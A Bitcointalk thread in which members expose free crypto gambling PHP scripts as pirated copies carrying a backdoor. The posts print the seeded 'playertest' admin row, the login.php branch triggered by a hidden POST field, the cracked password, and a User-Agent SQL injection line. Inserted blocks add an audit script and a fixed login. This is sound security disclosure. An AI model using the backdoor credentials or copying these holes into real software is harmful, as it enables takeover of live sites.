Bitcoin Forum
Topic: [Open Source] CryptoBlackJack & CryptoDice Gambling Scripts (Read 6530 times)
felinegambler (OP)
Newbie
December 31, 2014, 07:55:18 AM
 #1

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

If you need help with installation I am more than willing to help you. Please email me at felinegambler@gmail.com

Please Read

Due to me giving this away for free there have been some "authenticity issues". I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!
TechnoBibble
Member
December 31, 2014, 09:23:03 AM
 #2

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!

Thank You for the new release, I will Audit these scripts when I get home from work tonight.
felinegambler (OP)
Newbie
December 31, 2014, 11:21:48 AM
 #3

Thanks. I can assure you there is nothing hidden. It would be good to have an independent audit of the software.
Muhammed Zakir
Hero Member
December 31, 2014, 11:30:03 AM
 #4

Hello! Can you extract the dice-rolling script from this and send it to me? I can give some BTC if you want. Smiley

   ~~MZ~~

LOBSTER
Hero Member
December 31, 2014, 11:32:50 AM
 #5

Can you show some screenshots? Before downloading and installing, I want to see it Cheesy

But it's not the script from Johny1976?
Muhammed Zakir
Hero Member
December 31, 2014, 11:43:59 AM
Last edit: December 31, 2014, 01:19:34 PM by Muhammed Zakir
 #6

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. Smiley

   ~~MZ~~

LOBSTER
Hero Member
December 31, 2014, 11:54:21 AM
 #7

Can you show some screenshots? Before downloading and installing, I want to see it Cheesy

You can use Github for demos. They offer making sites for the Github repos.

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses. Smiley

   ~~MZ~~

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johny's script.
felinegambler (OP)
Newbie
December 31, 2014, 12:01:26 PM
 #8

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who can't afford to be scammed out of 1 BTC and then their wallet contents.

Anyway... It's now on GitHub for people to share and distribute freely.
Sam the Man
Newbie
December 31, 2014, 12:05:15 PM
 #9

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.
felinegambler (OP)
Newbie
December 31, 2014, 12:09:48 PM
 #10

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.
elm
Legendary
December 31, 2014, 12:15:20 PM
 #11

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley
felinegambler (OP)
Newbie
December 31, 2014, 12:19:26 PM
 #12

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley

Yeah of course, it's something I started a while back which I've been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, as personally it's my favorite game.

LOBSTER
Hero Member
December 31, 2014, 12:21:19 PM
 #13

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who can't afford to be scammed out of 1 BTC and then their wallet contents.

Anyway... It's now on GitHub for people to share and distribute freely.

Thanks! Nice work!
Muhammed Zakir
Hero Member
December 31, 2014, 12:21:26 PM
 #14

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johny's script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! Smiley

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who can't afford to be scammed out of 1 BTC and then their wallet contents.

Anyway... It's now on GitHub for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! Smiley

   ~~MZ~~

felinegambler (OP)
Newbie
December 31, 2014, 12:38:14 PM
 #15

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johny's script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it! Smiley

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who can't afford to be scammed out of 1 BTC and then their wallet contents.

Anyway... It's now on GitHub for people to share and distribute freely.
Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Can you please post pics like LOBSTER said? And, please reply to my question. Thanks! Smiley

   ~~MZ~~

Of course, I will get some pics when I am back home tonight and put them on this thread.

Thanks for the github.io link, I will see if I can upload a demo also.
elm
Legendary
December 31, 2014, 12:47:51 PM
 #16

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.


Hi, I am working on a couple which will be released in the next week Smiley

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor Smiley

Yeah of course, it's something I started a while back which I've been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, as personally it's my favorite game.



thanks for the good work. may I PM you regarding the holdem? because I have my own holdem idea and would like to know if You can/would do it and I sure wanna pay for it.
felinegambler (OP)
Newbie
December 31, 2014, 01:13:08 PM
 #17

of course, send me your suggestions. I will see if I can implement them.
felinegambler (OP)
Newbie
December 31, 2014, 01:39:35 PM
 #18

Problem

Whilst installing the blackjack game I have noticed a problem with the login. I wouldn't suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.
cloverme
Legendary
December 31, 2014, 04:18:06 PM
 #19

I can check out the blackjack script and see if any of johny's work is in there. The newbie verifications in this thread don't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>
");      ?><?php
  fclose($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>
");      ?><?php
  fclose($db_file);
TechnoBibble
Member
December 31, 2014, 04:24:43 PM
Last edit: December 31, 2014, 04:39:47 PM by TechnoBibble
 #20

I am also in the process of looking through this script. I agree, downloaders beware of anything and everything... I personally do not install any code that I have not read through myself. As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

If the $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table, which in this case holds our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
  if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7") hash is, maybe someone with more experience in cracking passwords would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?
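
The check described in the post above can be automated as a first pass when auditing an install package. The following PHP is an added example, not part of the thread and not code from either project: it flags SQL dumps that seed rows containing a 32-hex (MD5-style) value, lists the tables a login source checks passwords against, and reports tables that appear in both. The function names, the heuristics and the two sample strings are assumptions constructed for illustration, modelled on the snippets quoted in the post.

```php
<?php
// Added audit example; not code from the thread or from either project.
// Heuristics and function names are assumptions made for this illustration.

/** INSERT statements in a SQL dump that seed a quoted 32-hex (MD5-style) value. */
function find_seeded_credentials(string $sql): array
{
    $hits = [];
    preg_match_all('/INSERT\s+INTO\s+`?(\w+)`?.*?;/is', $sql, $stmts, PREG_SET_ORDER);
    foreach ($stmts as $stmt) {
        if (preg_match_all("/'([0-9a-f]{32})'/i", $stmt[0], $h)) {
            $hits[] = ['table' => $stmt[1], 'hashes' => $h[1]];
        }
    }
    return $hits;
}

/** Tables a login source checks passwords against, and request keys it branches on. */
function audit_login_source(string $php): array
{
    preg_match_all('/FROM\s+`?(\w+)`?\s+WHERE.*?passw(?:or)?d`?\s*=/i', $php, $t);
    preg_match_all(
        '/if\s*\(\s*!?\s*(?:empty|isset)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\[\s*[\'"]([^\'"]+)/i',
        $php,
        $k
    );
    $tables = array_values(array_unique($t[1]));
    return [
        'auth_tables' => $tables,
        // Compare these against the fields the login form actually submits.
        'branch_keys' => array_values(array_unique($k[1])),
        // One login page authenticating against several tables needs an explanation.
        'suspicious'  => count($tables) > 1,
    ];
}

/** Tables that are both seeded with a hash at install time and used for admin login. */
function backdoor_candidates(string $sql, string $php): array
{
    $seeded = array_column(find_seeded_credentials($sql), 'table');
    $auth   = audit_login_source($php)['auth_tables'];
    return array_values(array_intersect($auth, $seeded));
}

// Constructed samples, abridged from the dump and login.php lines quoted in the post.
$dump = <<<'SQL'
CREATE TABLE `ga_players` (`id` int(255) NOT NULL, `username` varchar(20), `passwd` text);
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
SQL;

$login = <<<'PHP'
if (!empty($_POST['ga_playertest'])) {
  $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
  $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
PHP;

print_r(find_seeded_credentials($dump));
print_r(audit_login_source($login));
print_r(backdoor_candidates($dump, $login));
```

Anything the last call returns is a candidate for manual review, not a verdict; a clean result does not show that a package is free of backdoors.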
LOBSTER
Hero Member
December 31, 2014, 04:25:46 PM
 #21

I can check out the blackjack script and see if any of johny's work is in there. The newbie verifications in this thread don't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>
");      ?><?php
  fclose($db_file);

Install from official Coinjack:
Code:
if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
 
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");
  fwrite($db_file,'$conf_c=true;'."\n");
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>
");      ?><?php
  fclose($db_file);

As I said...but he meant that he fixed some bugs.
elm
Legendary
December 31, 2014, 04:29:27 PM
 #22

I can check out the blackjack script and see if any of johny's work is in there. The newbie verifications in this thread don't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

are there many open source gambling scripts with backdoors on github?
johny1976
Legendary
December 31, 2014, 04:31:24 PM
 #23


due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.


And it's also copyrighted. Please stop sharing our scripts for free.

SCAMMER

I recommend everyone not to download these backdoored versions of our software. These are not even the latest versions and contain security bugs.

If you buy full license from us, you'll get free lifetime support + updates. See my signature.
elm
Legendary
December 31, 2014, 04:36:05 PM
 #24

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?
LOBSTER
Hero Member
December 31, 2014, 04:37:25 PM
 #25

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?

So true...best option: develop your own script!
cloverme
Legendary
December 31, 2014, 04:38:13 PM
 #26

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not, my advice is to avoid the pirate copy and just buy the script from johny if you want it.
LOBSTER
Hero Member
December 31, 2014, 04:39:42 PM
 #27

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not.

At first he should tell us which bugs are in the script and how he fixed it. That would help to trust and retrace.
TechnoBibble
Member
December 31, 2014, 04:42:12 PM
 #28

For Your Information, I have just found a backdoor in /admin/login.php

Please see this post (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462)
elm
Legendary
December 31, 2014, 04:43:10 PM
 #29

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?

So true...best option: develop your own script!

I can't code :(( so what should I do?
cloverme
Legendary
December 31, 2014, 04:44:24 PM
 #30


Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7") hash is, maybe someone with more experience in cracking passwords would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I do have the licensed game yes, none of that code is in there, so it looks like you found the exploit in the scammer's attempt.
johny1976
Legendary
December 31, 2014, 04:44:56 PM
 #31

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php

This should help you guys make clear who is the scammer here. :-)
cloverme
Legendary
December 31, 2014, 04:47:24 PM
 #32

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.
johny1976
Legendary
December 31, 2014, 04:47:43 PM
 #33

confused now... where are the backdoors? who is honest here? what is going on here? I can't code so I can't check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.

Thank you, corrected.
redsn0w
Legendary
December 31, 2014, 04:56:06 PM
 #34

Scam accusation against you : https://bitcointalk.org/index.php?topic=909282.0

Please try to resolve it (I've left you a negative trust for only a question of security, when you will resolve this situation I will remove it).

Thanks for the attention, have a great day.
TechnoBibble
Member
December 31, 2014, 04:58:21 PM
 #35

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?
redsn0w
Legendary
December 31, 2014, 05:00:08 PM
 #36

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0
Thanks, I've seen it. Now I suggest to leave a negative trust to the OP (for a security reason, it will remove when all the situation will be clarified).
johny1976
Legendary
December 31, 2014, 05:02:01 PM
 #37

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.

TechnoBibble
Member
December 31, 2014, 05:06:03 PM
 #38

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.



lol, did not see in your sig, I tend to ignore them Wink

added to post.
elm
Legendary
December 31, 2014, 05:09:54 PM
 #39

but to be frank Johnny has the worst support for his Black Jack script IMO please see here
https://bitcointalk.org/index.php?topic=718910.0
LilGhost
Member
December 31, 2014, 06:07:56 PM
Last edit: December 31, 2014, 08:06:23 PM by LilGhost
 #40

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue throughout the script. Frequently the script records the user-agent without sanitizing it first.
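
The logging line quoted in the post above and the login queries shown earlier in the thread all build SQL by string concatenation. The PHP below is an added example, not part of the thread and not the project's code: it shows the same login and log insert written with bound parameters, a single credential table and `password_hash()`. It assumes the `pdo_sqlite` extension so that it runs without a MySQL server; `admin_login`, the account and the request values are constructed for illustration.

```php
<?php
// Added example; not the project's code. PDO with in-memory SQLite keeps it
// runnable without a MySQL server; table and field names follow the quoted snippets.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, passwd TEXT NOT NULL)');
$pdo->exec('CREATE TABLE admin_logs (admin_username TEXT, ip TEXT, browser TEXT)');

// Constructed account. password_hash() replaces the unsalted md5() of the quoted code.
$pdo->prepare('INSERT INTO admins (username, passwd) VALUES (?, ?)')
    ->execute(['admin', password_hash('constructed-example-password', PASSWORD_DEFAULT)]);

/** Hypothetical login handler: one table, bound parameters, no request-selected branch. */
function admin_login(PDO $pdo, array $post, array $server): bool
{
    $user = is_string($post['hash_one'] ?? null) ? $post['hash_one'] : '';
    $pass = is_string($post['hash_sec'] ?? null) ? $post['hash_sec'] : '';

    // Only `admins` is ever consulted; extra POST fields such as ga_playertest are ignored.
    $q = $pdo->prepare('SELECT passwd FROM admins WHERE username = ? LIMIT 1');
    $q->execute([$user]);
    $hash = $q->fetchColumn();
    if ($hash === false || !password_verify($pass, $hash)) {
        return false;
    }

    // Bound parameters: the client-controlled User-Agent is stored as data, never as SQL.
    $log = $pdo->prepare(
        'INSERT INTO admin_logs (admin_username, ip, browser) VALUES (?, ?, ?)'
    );
    $log->execute([
        $user,
        (string)($server['REMOTE_ADDR'] ?? ''),
        substr((string)($server['HTTP_USER_AGENT'] ?? ''), 0, 255),
    ]);
    return true;
}

// Constructed request data: a User-Agent containing quote and comment characters.
$server = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_USER_AGENT' => "Mozilla/5.0 (O'Brien); --"];

$ok = admin_login(
    $pdo,
    ['hash_one' => 'admin', 'hash_sec' => 'constructed-example-password'],
    $server
);
$stored = $pdo->query('SELECT browser FROM admin_logs')->fetchColumn();
var_dump($ok, $stored === $server['HTTP_USER_AGENT']);

// The seeded account from the thread is not in `admins`, so the extra field changes nothing.
$bd = admin_login(
    $pdo,
    ['ga_playertest' => '1', 'hash_one' => 'playertest', 'hash_sec' => 'playertest1'],
    $server
);
var_dump($bd);
```

Against MySQL the same statements work with a `mysql:` DSN; setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the driver bind parameters server-side.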
MarkMJ
Hero Member
July 06, 2015, 05:13:47 PM
 #41

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

elm
Legendary
July 06, 2015, 05:44:14 PM
 #42

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?
myfirst
Full Member
July 06, 2015, 06:29:34 PM
 #43

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue throughout the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?
johny1976
Legendary
July 06, 2015, 08:41:56 PM
 #44

The admin login page is vulnerable to SQL injection.

Code:
mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.



Edit: This is a recurring issue throughout the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.
ca333
Hero Member
November 11, 2015, 08:02:02 AM
 #45

I am also in the process of looking through this script. I agree, downloaders beware of anything and everything... I personally do not install any code that I have not read through myself. As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

If the $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table, which in this case holds our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
  if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7") hash is, maybe someone with more experience in cracking passwords would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advise anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...

